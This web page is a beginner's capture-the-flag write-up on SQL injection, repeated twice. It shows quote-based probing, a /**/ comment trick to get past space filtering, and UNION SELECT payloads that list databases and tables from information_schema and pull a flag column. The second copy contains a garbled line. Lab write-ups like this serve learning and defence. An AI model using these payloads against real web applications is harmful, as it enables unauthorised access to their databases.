Home >Database >Mysql Tutorial >Simple examples related to sql injection

Simple examples related to sql injection

巴扎黑
巴扎黑Original
2017-08-11 15:11:052916browse

The so-called SQL injection is to insert a SQL command into a Web form to submit or enter a domain name or query string for a page request, and ultimately trick the server into executing malicious SQL commands. Next, I will share with you a simple sql injection. Let’s take a look.

The so-called SQL injection is to insert a SQL command into a web form to submit or enter a query string for a domain name or page request, and ultimately deceive the server. Execute malicious SQL commands. Specifically, it is the ability to use existing applications to inject (malicious) SQL commands into the backend database engine for execution. It can obtain information on a website with security vulnerabilities by entering (malicious) SQL statements into a web form. database, rather than executing SQL statements as intended by the designer. For example, many previous film and television websites leaked VIP membership passwords, mostly by submitting query characters through WEB forms. Such forms are particularly vulnerable to SQL injection attacks.

Enter 1, 2, and 3 respectively and there will be corresponding results.

Using ' will report an error, so

constructs commonly used sql statements: 1' and '1'='1

No response Try 1' and '1'='2

## Still no response, tool tip, it should be filtering something, try changing the sql statement

1and1=1

can display things , after filtering the spaces, we used /**/ to replace spaces

try 1'/**/'1'='1

Found that there is a result:

Then build the sql statement:

Determine which databases there are:


1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

You can see the results:

Check what data tables there are:


1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

Found the flag table, we guess it should be in the web1 database and the field is flag (actually in the database of this page)

So:


1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

I am also a beginner, and I have referred to the wp of many big guys. I hope you will point out any mistakes after writing them, thank you!

According to the page prompts, what exactly is filtered? You can know what is filtered....

Enter 1, 2, and 3 respectively to get the corresponding results

Using ' will report an error, so

construct commonly used sql statements: 1' and '1'='1

No response, try it Try 1' and '1'='2

## Still no response, the tool prompts, it should be filtering something, change the sql statement and give it a try

1and1=1

can display things. After judging the spaces, we use /**/and/**&*&*/'1'='1

and found the result:

Then construct the sql statement:

Determine which databases there are:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

You can see the results:


Check what data tables there are:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1


Found the flag table, we guess it should be in In the web1 database, the field is flag (actually in the database of this page)

So:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1


The above is the detailed content of Simple examples related to sql injection. For more information, please follow other related articles on the PHP Chinese website!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn